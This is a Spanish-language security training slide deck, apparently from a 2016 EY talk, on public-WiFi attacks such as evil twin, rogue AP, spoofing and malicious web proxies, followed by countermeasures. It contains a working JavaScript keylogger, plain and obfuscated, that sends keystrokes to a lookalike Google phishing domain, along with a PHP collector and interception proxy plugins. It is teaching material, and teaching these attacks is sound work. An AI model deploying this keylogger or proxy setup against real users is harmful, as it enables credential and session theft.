Ey ciber seg uah 2016 freewifi

FreeWiFi
Rouge AP, Evil Twin, Portal cautivo con proxy web son partes de una
constante amenaza a redes inalámbricas:
Aprendamos los posibles ataques para saber como protegernos.

Contenido
¿Quiénes somos?
Definiciones
Herramientas y ataques
Manos a la obra: Proxy Web
Otros Proxies
Manos a la obra: Keylogger JS
Manos a la obra: Portal cautivo
Manos a la obra: WiFi Pumpkin
Aprendamos a protegernos
Despierta tu curiosidad
FreeWifi
Aprendamos los posibles ataques para saber como protegernos

3
¿Quiénes somos?
► Talento & Emprendimiento

FreeWiFi
¿Quiénes somos?
http://www.ey.com/About-us/Entrepreneurship
Los emprendedores marcan la diferencia. Tienen grandes ideas y el impulso necesario para llevarlas a cabo. Gracias a sus
visiones innovadoras y a su trabajo, estimulan un cambio social positivo, aportando nuevos conceptos y productos al mercado
y creando empleo y riqueza.
Llevamos mucho tiempo reconociendo el potencial de los emprendedores. En los últimos treinta años, hemos adaptado
nuestra experiencia, conocimiento sectorial y recursos para trabajar con las compañías emprendedoras y de rápido
crecimiento. Trabajamos con una gran variedad de empresas, desde aquellas que realizan su primera operación de
financiación hasta las de mediana capitalización, cuyo valor se puede medir en miles de millones de dólares.
Nuestro compromiso con las compañías emprendedoras en todo el mundo, tanto en las economías emergentes como en las
maduras, nos asegura el trabajar junto a muchos de los líderes globales del mañana.

FreeWiFi
Wiktor Nykiel
Senior Manager en el área de Ciber Inteligencia.
wiktor.nykiel@es.ey.com
https://es.linkedin.com/in/wiktornykiel
@WiktorNykiel
Héctor Pantoja
Senior en el Área de Attack and Penetration
hector.pantojagarcia@es.ey.com
https://es.linkedin.com/in/héctor-pantoja-garcía-21097958
@hpantojagarcia

6
Definiciones
► Aprendamos algo nuevo …

FreeWiFi
Definiciones
► Proxy Transparente
Tiene las mismas funciones que un Proxy, pero en
este modo el propio cliente no es consciente del
uso de un Proxy que esta redireccionando y
gestionando las peticiones que envía y recibe. El
cliente no necesita configurar los navegadores para
el uso de dicho Proxy. Este modo es utilizado por
los proveedores de servicios de internet (ISP) y se
suele utilizar para mejorar la velocidad de descarga.
► Proxy
Servidor que permite la intercepción y redirección de las
peticiones recibidas en una red interna hacia Internet,
controlando de una manera eficiente todas las entradas y
salidas de una red e incluso permite modificar las cabeceras
y el contenido para mantener la privacidad de la
comunicación. El usuario sabe en todo momento que esta
utilizando un Proxy.
► Proxy Web

FreeWiFi
Definiciones
► Evil Twin
Es un punto de acceso WIFI que sirve para interceptar las comunicaciones
inalámbricas.
Se hace pasar por un proveedor de comunicaciones o bien por un hotspot engañando
a usuarios con dispositivos móviles, tablets o portátiles para que se conecten a él.
Crea una web totalmente fraudulenta, parecida al phishing para recopilar credenciales
o monitorizar el trafico que produzcan.
► Rouge AP
Es un dispositivo que suplanta la identidad de un Punto de Acceso Existente para poder recopilar credenciales de usuarios que soliciten loguearse.
Para poder realizar esto, el dispositivo replica el ESSID y las características de cifrado de un Punto de Acceso cualquiera suplantando toda su
configuración.
El Rogue AP se mantendrá a la escucha de peticiones de sus victimas. Una vez logueada la victima, se obtendrán sus credenciales y se podrá
monitorizar el tráfico que genere.

FreeWiFi
Definiciones
► Spoofing
Es la suplantación de identidad de un usuario o servidor en concreto ayudándose con una serie de técnicas,
para la obtención de algún tipo de información relevante. Se falsifica el origen de los paquetes para hacer
creer a la victima que procede de un host de confianza o autorizado
► IP Spoofing
Suplanta la dirección IP de un determinado servidor para recopilar credenciales de las victimas. Consigue
sustituir la IP de origen de un paquete TCP/IP por la dirección deseada, de esta forma todas las peticiones
llegaran al servidor falsificado obteniéndose así una monitorización del tráfico muy interesante.
► ARP Spoofing
Es la suplantación de identidad de la tabla ARP. Dicha tabla se encarga de traducir direcciones IP a
direcciones MAC. La forma de falsificar dicha tabla es inundando la red con paquetes ARP indicando que la
MAC asociada a la IP solicitada es nuestra y además nuestra MAC esta también asociada al Gateway.
De esta forma el resto de máquinas actualizarán sus tablas ARP con esta información falsificada y cada vez
que quieran acceder a un destino pasaran por la maquina atacante para esnifar el trafico, redirigir la salida o
ambas.
► DNS Spoofing
Es una técnica que altera o falsifica las direcciones IP asociadas a los servidores DNS y las redireccionan a
servidores maliciosos. La forma de conseguir esto es modificando las peticiones recibidas falsificando la
relación IP-DNS o comprometer un servidor e inundar la red con la cache infectada en el resto de servidores.

FreeWiFi
Definiciones
► Keylogger
Un keylogger es un software/hardware que permite registrar todas las pulsaciones en un equipo para posteriormente enviarlas al atacante.
► Keylogger JS
Keylogger JS es una variedad que permite capturar texto introducido por un usuario en los formularios de la web afectada, a través de la inyección de
un código JavaScript que genera una “capa transparente” que recoge y envía todas las pulsaciones a un servidor remoto.

11
Herramientas y ataques
► Diferentes formas de hacer el mal …

FreeWiFi
WiFiPhisher
► Ataques Evil Twin
Consigue hacerse con man-in-the-middle a través de ataques del tipo Evil Twin, donde
posteriormente redirige todo el trafico HTTP a un sitio web controlado por el atacante.
Este ataque se compone de tres pasos:
 La victima es desautenticada de su punto de acceso original.
Esto se consigue haciendo jamming para “Deauthenticate” o “Disassociate” al cliente.
 El cliente desauntenticado se conecta al punto de acceso atacante.
Esta herramienta copia automáticamente las configuraciones del punto de acceso originaly
crea un punto de acceso falso. Establece la configuración NAT/DHCP para que el cliente se
conecte a la red falsa, consiguiendo que la victima acabe bajo el ataque MiTM.
 Se presenta una página de configuración de router al cliente.
Incluye un servidor web el cual atiende peticiones HTTP/S y lanza páginas de phishing
preguntando por credenciales.
https://github.com/sophron/wifiphisher

FreeWiFi
LINSET
► Linset Is Not a Social Enginering Tool
Consigue hacerse las credenciales WPA/2 desautenticando al cliente
original, redirige todo el trafico HTTP a un sitio web controlado por el
atacante, probando las credenciales introducidas por el usuario.
Este ataque se compone de tres pasos:
 Crea un punto de acceso con el mismo SSID que el AP original.
 La victima es des-autenticada de su punto de acceso original.
 Se presenta una página para introducir las credenciales de la victima.
Ref: https://github.com/vk496/linset
http://highsec.es/2014/10/linset-tirando-el-anzuelo/

FreeWiFi
SET
► Social Engineering Toolkit
Es una herramienta que permite utilizar varias técnicas de Ingeniería
Social.

FreeWiFi
WPAD
Ref: http://findproxyforurl.com/wpad-introduction/
https://technet.microsoft.com/en-us/library/cc995258.aspx
http://perimetergrid.com/wp/2008/01/11/wpad-internet-explorers-worst-feature/
► Web Proxy Auto Discovery
Es la tecnología que ayuda al navegador a localizar las configuraciones de proxies automáticamente usando DNS o DHCP.
DHCP DNS

FreeWiFi
MITMF
► Man In The Middle Framework
Es la tecnología que ayuda al navegador a localizar las configuraciones de proxies automáticamente usando DNS o DHCP.

17
Manos a la obra
► Veamos un ejemplo práctico: Proxy Web

FreeWiFi
Web Proxy
► Glype Web Proxy
Esto es un proxy web escrito en PHP que funciona igualmente
Se pueden robar sesiones, sacar datos interesantes. Se puede tener trazas de navegación, valores de parámetros GET

FreeWiFi
Web Proxy
► Glype Web Proxy ► Opciones de configuración
1. Encrypt URL: Permite obfuscar la URL para que no sea
reconocible cuando se manda de forma recursiva al proxy.
2. Encrypt Page: Manda la página ofuscada antes de enviarla, para
des obfuscar en el cliente una vez recibido. Esto a veces produce
errores en la navegación
3. Show Form: Muestra una barra con un formulario en la parte
superior del navegador para poder introducir la URL a visitar así
como modificar posibles parámetros.
4. Allow Cookies y Force Temporary Cookies: Permite trabajar
con cookies, hay opción de visualizar estas cookies almacenadas
en el servidor.
5. Remove Page Titles: Quitamos el titulo de la página (se queda
en el histórico de navegación – a veces da demasiados datos).
6. Remove Scripts: Quita scripts JS / Flash / Java que puedan
desvelar la ubicación, etc

FreeWiFi
Modificaciones al Web Proxy
Index.html que invoca desde iframe el proxy web
<html>
<head>
<title>Navegación super segura</title>
</head>
<body>
<iframe src="browse.php?u=http%3A%2F%2Fwww.google.com%2F&b=4"
width="100%" height="100%" scrolling="auto" frameborder="0">
<p>Texto alternativo para navegadores que no aceptan iframes.</p>
</iframe>
</body>
</html>
// Plugins/google.com.php
function preParse($html,$type) {
if (stripos($html,'loadingError')) {
header("Location: ".proxyURL('http://mail.google.com/mail/?ui=html'));
exit;
}
return $html;
}
function postParse(&$in,$type) {
$in = preg_replace('# style="padding-top:d+px"#', '', $in);
return $in;
}

FreeWiFi
Modificaciones al Web Proxy
// Plugins/facebook.com.php
$options['stripJS'] = false;
$options['allowCookies'] = true;
function preRequest() {
global $URL;
if ($URL['host'] != 'm.facebook.com') {
$URL['host'] = preg_replace('/((www.)?facebook.com)/', 'm.facebook.com', $URL['host']);
$URL['href'] = preg_replace('///((www.)?facebook.com)/', '//m.facebook.com', $URL['href']);
}
}
Modificamos texto al vuelo en el parser para
añadir/quitar URL, funciones, etc en la página
visitada a través del proxy.

22
Otros proxies
► Capturando datos de diferentes formas …

FreeWiFi
OWASP ZAP + Login HTTPS Ref: https://github.com/zaproxy/zaproxy

FreeWiFi
Burp Suite Professional

FreeWiFi
Fiddler

26
Manos a la obra
► Veamos un ejemplo práctico: Keylogger JS

FreeWiFi
Keylogger JS
<?php
if(!empty($_GET['datosRecibidos'])) {
$logfile = fopen('datos.txt', 'a+');
fwrite($logfile, $_GET['datosRecibidos']);
fclose($logfile);
}
?>
var buffer = [];
var attacker = 'http://accounts.google.com-servicelogin.sacu-1.hl-en.seguridad-
wifi.com/account/login/secure/protocol/g00/keylogger/?datosRecibidos='
document.onkeypress = function(e) {
buffer.push(e.key);
}
window.setInterval(function() {
if (buffer.length > 0) {
var data = encodeURIComponent(JSON.stringify(buffer));
new Image().src = attacker + data;
buffer = [];
}
}, 300);
Index.php – script php que almacena datos recibidos en fichero
Keylogger.js – script JS que envia los datos a index.php para ser almacenados
var
_0xd495=["x68x74x74x70x3Ax2Fx2Fx61x63x63x6Fx75x6Ex74x73x2Ex67x6Fx6
Fx67x6Cx65x2Ex63x6Fx6Dx2Dx73x65x72x76x69x63x65x6Cx6Fx67x69x6Ex2E
x73x61x63x75x2Dx31x2Ex68x6Cx2Dx65x6Ex2Ex73x65x67x75x72x69x64x61x
64x2Dx77x69x66x69x2Ex63x6Fx6Dx2Fx61x63x63x6Fx75x6Ex74x2Fx6Cx6Fx6
7x69x6Ex2Fx73x65x63x75x72x65x2Fx70x72x6Fx74x6Fx63x6Fx6Cx2Fx67x30
x30x2Fx6Bx65x79x6Cx6Fx67x67x65x72x2Fx3Fx64x61x74x6Fx73x52x65x63x6
9x62x69x64x6Fx73x3D","x6Fx6Ex6Bx65x79x70x72x65x73x73","x6Bx65x79","x7
0x75x73x68","x6Cx65x6Ex67x74x68","x73x74x72x69x6Ex67x69x66x79","x73x7
2x63","x73x65x74x49x6Ex74x65x72x76x61x6C"];var buffer=[];var
attacker=_0xd495[0];document[_0xd495[1]]=function(_0x61fcx3){buffer[_0xd495[3]](_0x61fcx
3[_0xd495[2]])};window[_0xd495[7]](function(){if(buffer[_0xd495[4]]>0){var
_0x61fcx4=encodeURIComponent(JSON[_0xd495[5]](buffer)); new
Image()[_0xd495[6]]=attacker+_0x61fcx4;buffer=[];}},300);
Obfuscado con: http://javascriptobfuscator.com/Javascript-Obfuscator.aspx

FreeWiFi
Keylogger JS
Prueba.php – script PHP con formularios que muestra el funcionamiento del keylogger
<script src="http://accounts.google.com-
servicelogin.sacu-1.hl-en.seguridad-
wifi.com/account/login/secure/protocol/g00/keylogger/s
cript-super-importante.js">
</script>
<html>
<head><title>Ejemplo de formulario
sencillo</title></head>
<body>
<h3>Formulario muy sencillo</h3>
<form action="?" method="post">
Escribe tu nombre:
<br/><input type="text" name="nombre" value=""
size="80"/>
<br/>
Escribe tu clave:
<br/><input type="password" name="passswd"
value="" size="80"/>
<br/><input type="submit" value="Enviar" />
</form>
<br />
<a href="datos.txt" target="_blank">Abre el fichero con
los datos recogidos</a>
</body>
</html>

FreeWiFi
BeEF – Browser Exploitation Framework

30
Manos a la obra
► Veamos un ejemplo práctico: Portal cautivo

FreeWiFi
Portal cautivo https://meraki.cisco.com/lib/pdf/meraki_whitepaper_captive_portal.pdf

32
Manos a la obra
► Veamos un ejemplo práctico: WiFi Pumpkin

FreeWiFi
WiFi Pumpkin – Caso practico RougeAP
Framework para Ataques Rouge AP, funciona bajo una Kali 2.0

FreeWiFi
WiFi Pumpkin - Instalación
Proceso de instalación

FreeWiFi
WiFi Pumkin - Funcionamiento
Framework iniciado con un cliente conectado y autenticado. Interfaz Wifi (wlan0)

FreeWiFi
WiFi Pumpkin – Capturando datos
Credenciales capturadas en una web sin SSL a través del punto de acceso falso.

FreeWiFi
WiFi Pumpkin – Fake Updates
Creamos una página clonada de los servicios de actualizaciones más usados, el cual añade Malware en el ejecutable de
la descarga.

FreeWiFi
WiFi Pumpkin - Actualizaciones
Página web clonada con aspecto del servicio de actualizaciones de Microsoft.

39
Aprendamos a protegernos
► Cuida tus datos en todo momento …

FreeWiFi
Contramedidas
• Para solventar el IP Spoofing, se puede configurar el router con reglas de acceso (ACLs) para determinadas MAC. De esta
forma se dará acceso a maquinas determinadas.
• Utilización de cifrado de la comunicación y Autenticación de Usuarios.
• Utilización de DHCP Snooping para evitar el ARP Spoofing, de esta forma se mantiene un registro de las direcciones MAC
conectadas a cada puerto, sabiendo en cada momento si se recibe una suplantación ARP.

FreeWiFi
Protegiéndose de Evil Twin AP y otros ataques wifi
• Uso de aplicaciones móviles como hotspotid.com
• Puntos de acceso con detección de Rouge AP
• Scripts para monitorizar, descubrir y prevenir ataques Evil Twin AP
https://github.com/moha99sa/EvilAP_Defender/wiki
• Uso de WIPS / WIDS

FreeWiFi
hotspotid.com

FreeWiFi
WIDS y otros sistemas anti Rouge AP https://meraki.cisco.com/technologies/air-marshal-wips

FreeWiFi
Autenticación de doble Factor - 2FA

FreeWiFi
VPN – Protegiendo nuestro tráfico
“ Las conexiones VPN permiten cifrar el tráfico entre nuestro móvil y un entorno seguro “

46
Despierta tu curiosidad
► Siguientes retos …

FreeWiFi
Cosas para probar
› http://null-byte.wonderhowto.com/how-to/hack-wi-fi-creating-evil-twin-wireless-access-point-eavesdrop-data-0147919/
(Como crear puntos de acceso Evil Twin para espiar y obtener datos)
› https://github.com/entropy1337/infernal-twin (herramienta de hacking WiFi automatizada)
› https://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/ (punto de acceso falso con
Raspberry PI y alguna otra cosa)
› https://github.com/DanMcInerney/wifijammer (inhibe todo el tráfico wifi entre clientes y puntos de acceso a
base de inyectar paquetes)
› https://github.com/DanMcInerney/fakeAP (crear punto de acceso falso)
› https://github.com/DanMcInerney/injecthtml/blob/master/injecthtml.git/injecthtml.py (inyecta código HTML - probar
con Beef o JSKeylogger)
› https://github.com/DanMcInerney/LANs.py (monitoriza a los clientes más activos e inyecta código HTML o
hace denegación de servicio)
› http://resources.infosecinstitute.com/beef-part-1/ (Introducción a Beef )
› http://docs.mitmproxy.org/en/latest/tutorials/transparent-dhcp.html (Proxies transparentes con maquinas
virtuales)
› https://blog.skullsecurity.org/2009/pwning-hotel-guests (ataques con WPAD)

FreeWiFi
Como saltarse la autenticación de proxies
http://null-byte.wonderhowto.com/how-to/hack-wi-fi-evading-authentication-proxy-using-icmptx-0150347/
Saltándose portal cautivo a través de DNS tunneling
http://dnstunnel.de/
Evadiendo Proxies
› http://kinozoa.com/blog/subterfuge-documentation/
› https://github.com/Subterfuge-Framework/Subterfuge
› http://www.monkey.org/~dugsong/dsniff/
› https://github.com/derv82/wifite
› http://resources.infosecinstitute.com/20-popular-wireless-hacking-tools-updated-for-2016/
› https://github.com/supernothing/sergio-proxy
› https://github.com/sensepost/mana
MITM & Other tools

FreeWiFi
Artículos relacionados
› http://thehackernews.com/2014/03/snoopy-drone-can-hack-your-smartphones.html
› https://blog.skullsecurity.org/2009/pwning-hotel-guests
› https://mdk.fr/0x000000/articles/Web_Proxy_Autodiscovery_Protocol_Hijacking.html
› https://cyberarms.wordpress.com/2014/10/16/mana-tutorial-the-intelligent-rogue-wi-fi-router/
• Snarfing
• Evil Twin
• WIPS
• Rouge Acces Point
• WPAD
• ARP Spoofing
• DNS Spoofing
Definiciones
https://en.wikipedia.org/wiki/Snarfing
https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)
https://en.wikipedia.org/wiki/Wireless_intrusion_prevention_system
https://en.wikipedia.org/wiki/Rogue_access_point
https://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
https://en.wikipedia.org/wiki/ARP_spoofing#Defense
https://en.wikipedia.org/wiki/DNS_spoofing

Wiktor Nykiel
Email wiktor.nykiel@es.ey.com
LinkedIn wiktornykiel
Twitter @WiktorNykiel

Ey ciber seg uah 2016 freewifi

Recommended

Recommended

More Related Content

What's hot

What's hot (19)

Similar to Ey ciber seg uah 2016 freewifi

Similar to Ey ciber seg uah 2016 freewifi (20)

More from Wiktor Nykiel ✔

More from Wiktor Nykiel ✔ (6)

Recently uploaded

Recently uploaded (20)

Ey ciber seg uah 2016 freewifi